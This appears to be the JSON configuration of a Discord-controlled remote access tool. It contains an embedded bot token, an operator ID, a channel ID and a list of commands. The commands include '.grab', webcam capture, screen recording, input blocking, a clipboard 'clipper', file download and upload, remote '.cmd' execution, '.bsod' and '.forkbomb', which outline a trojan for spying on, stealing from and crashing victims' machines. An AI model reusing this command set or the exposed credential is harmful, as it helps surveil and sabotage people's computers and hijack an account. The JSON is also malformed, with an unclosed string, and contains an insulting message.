{
    "token": "MTM0MDQ5MzExNjM4NTI2MzY1Ng.GezjLy.SFiKI8rHkzjYSMx4AwoujYw06MpyLFM5YY4ifk",
    "prefix": ".bot",
    "remote-users": [1087265737992847361],
    "autoreply": {
        "messages": [
            ".ss",
            ".join",
            ".show [what-to-show],
            ".kill [process-id]",
            ".grab [what-to-grab]",
            ".clear",
            ".pwd",
            ".tree",
            ".ls",
            ".download [file-or-dir]",
            ".upload [type] [name]",
            ".execute [file]",
            ".remove [file-or-dir]",
            ".implode",
            ".webcam photo",
            ".screenrec",
            ".block-input / .unblock-input",
            ".start-clipper / .stop-clipper",
            "..blacklist / .whitelist",
            ".bsod",
            ".forkbomb",
            ".tts",
            ".msg",
            ".cmd [command]",
            ".cd [dir]",
            
        ],
        "channels": [1341845055115366490],
        "users": [1087265737992847361]
    },
    "afk": {
        "enabled": false,
        "message": "I am AFK cuzzy kickback ya silly slut!"
    },
    "copycat": {
        "users": []
    }
}
